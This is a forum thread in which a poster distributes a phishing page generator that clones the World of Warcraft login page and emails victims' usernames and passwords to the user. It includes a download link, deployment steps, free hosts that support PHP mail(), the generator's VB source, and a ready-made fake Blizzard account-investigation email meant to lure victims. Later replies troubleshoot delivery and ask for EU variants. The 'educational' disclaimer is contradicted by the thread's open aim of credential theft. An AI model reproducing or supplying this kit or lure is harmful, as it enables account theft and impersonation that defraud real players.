[Program] PGen - Phishing Page Generator

[Gamer]

Note 1: This is posted for educational purposes only. I do not advocate phishing in anyway. This is provided to show users how phishing pages could potentially be produced by people with malicious intent, to protect them for falling from such schemes.
Note 2: If you download/use this please post feedback.
Note 3: This program works completely differently to the other page generator.

Hi guys!

This program allows you to enter your email address and it will generate a phishing site (PHP and HTML) identical to the official WoW login page that you can upload to your website. Although the program itself is fairly simplistic, most of the work went into the php mailing etc

How it works:

It takes the offical WoW login page and customises it to send the victim's username and password to you via email. All you need to do is fill in your email into the program, click generate and upload the files and you are ready to go.

What you need:
- A webhost that supports the PHP mail() function. There is a small list at the bottom of this post, and there are many more available on the internet.
- An email address.
- A FTP client (or if you could be bothered (not recommended) manually upload the files through your hosts file upload method)
- A lack of morals

What to do:

- Run the program
- Enter a name for the folder you want the files created in.
- Enter your email address, that the information will be sent to. (Victims can't see this email, it's hidden in the php script)
- Click generate.
- Upload the files in the created folder to a free host.



- Brief overview on how to upload:

Note: It will vary a bit for each host, but heres the overview.
- Register on their site.
- Find the FTP information (host, username, password)
- Enter the information into your ftp client. If you don't have one, I suggest Core FTP LE. It's free and functional. Free FTP client, secure file transfer software
- Upload the contents of the generated folder to your website.
- Link people to that address, and reap the rewards.

Screenshot:



Example of generated page




Virus Scan:



Download Link:
http://www.mediafire.com/file/hjnufwonkme/PGen_v0.1.rar


Here is a sample email you can use to direct people to your website:
(From Moji's post, at http://www.mmowned.com/forums/wow-sc...hing-scam.html, I take no credit for this letter)

Greetings,



An investigation of your World of Warcraft account has found strong evidence that the account in question is being sold or traded.
As you may not be aware of, this conflicts with Blizzard's EULA under section 4 Paragraph B which can be found here:
WoW -> Legal -> End User License Agreement


and Section 8 of the Terms of Use found here:

WoW -> Legal -> Terms of Use


The investigation will be continued by Blizzard administration to determine the action to be taken against your account.
If your account is found violating the EULA and Terms of Use, your account can, and will be suspended/closed/or terminated.

In order to keep this from occurring, you should immediately verify that you are the original owner of the account.



To verify your identity please visit the following webpage:

YOUR SITE HERE target="_blank">https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2Findex.html

Only Account Administration will be able to assist with account retrieval issues.
Thank you for your time and attention to this matter, and your continued interest in World of Warcraft.




Sincerely,



Account Administration

Blizzard Entertainment

Blizzard Support target="_blank">

Helpful Links:
Email to advertise your site (Moji): http://www.mmowned.com/forums/wow-sc...hing-scam.html
How to upload files etc. ([Royal]): http://www.mmowned.com/forums/wow-sc...-pictures.html


Some free hosts that support mail() function:

Orgfree.com - Free Web Hosting Area
Free Web Hosting with PHP, MySQL and cPanel, No Ads
Free Web Hosting Area


Note: I have not tried these but they claim to support the function from their page. There are many more you can find on the internet.

[supremeoverlord]

Cool, but its -not- too difficult to make one on your own, but this is still a cool idea.

[killahdude]

Mind posting the source code for this?

[Rec Alpam]

The source code; Just rewrite the old php page with the new ones. Imma VB and PHP Coder myself and i can tell you; This is easier then eating pie when its already in your mouth.

[supremeoverlord]

What about a virus scan? (no offence)

[killahdude]

How about one for WOW EU login page?

[Gamer]

Mind posting the source code for this?

Yep sure, here it is. As I said, most of the work went into the PHP (only because I don't know much php). The VB part is very simple.

Code:

    Private Sub btnGenerate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnGenerate.Click
        If txtName.Text = "" Or txtEmail.Text = "" Then
            MsgBox("Please enter a valid name and email address")
        Else
            Try

           
                'Create a folder of name entered.
                Dim FolderPath As String = Application.StartupPath & "\Sites\" & txtName.Text
                My.Computer.FileSystem.CreateDirectory(FolderPath)

                My.Computer.FileSystem.CopyDirectory(Application.StartupPath & "\Data", FolderPath)
                Dim ProcessingArray() As String = My.Computer.FileSystem.ReadAllText(FolderPath & "\processing.php").Split("%")
                Dim ProcessingString As String = ProcessingArray(0) & txtEmail.Text & ProcessingArray(1)


                My.Computer.FileSystem.WriteAllText(FolderPath & "\processing.php", ProcessingString, False)
                MsgBox("Success! Upload the contents of the folder " & FolderPath & " to your webserver and enjoy!")
            Catch ex As Exception
                MsgBox("Error creating files")
            End Try
        End If

     
    End Sub

The source code; Just rewrite the old php page with the new ones. Imma VB and PHP Coder myself and i can tell you; This is easier then eating pie when its already in your mouth.

Why thank you . I'll admit it's pretty easy. But TBH, the difficulty of eating pie when it is already in your mouth should not be underestimated.

Cool, but its -not- too difficult to make one on your own, but this is still a cool idea.

Yeah, I was hoping this might help people who weren't great with PHP or the likes.

What about a virus scan? (no offence)

Already in the post. You should look for a picture under the title: "Virus Scan"

How about one for WOW EU login page?

If it looks any different, you can just modify the HTML files to look the same, not too hard, and doesn't require any programming changes.

[Opalis]

I know nothing at all about PHP so the code for reading the URL arguments and using the mail() function was helpful, thanks.

[Akaras]

Not sending the data to my e-mail upon test. I have tried hotmail and gmail, how long does it usually take? I used 0fees.net. Going to bed, will edit post if it sends.

[Rigormortis199]

Nice program man! +rep

[Gamer]

Not sending the data to my e-mail upon test. I have tried hotmail and gmail, how long does it usually take? I used 0fees.net. Going to bed, will edit post if it sends.

This depends on your host, but it should be almost instant. Make sure the mail() function works properly on your host, the script works fine for me.

[Opalis]

This depends on your host, but it should be almost instant. Make sure the mail() function works properly on your host, the script works fine for me.

after a (very) small amount of research, I think you should be able to upload the following script to check if you server supports the function properly:

Code:

just call it something.php and navigate to it in your browser.

[rafin]

Awsome program man +rep

(offtopic Damn, i can give 1/3 of my own rep , 3 year old acc with 10 rep ftw ^^)

[ozziwar]

cool, nice to know

[SaifBloch]

How to create phishing page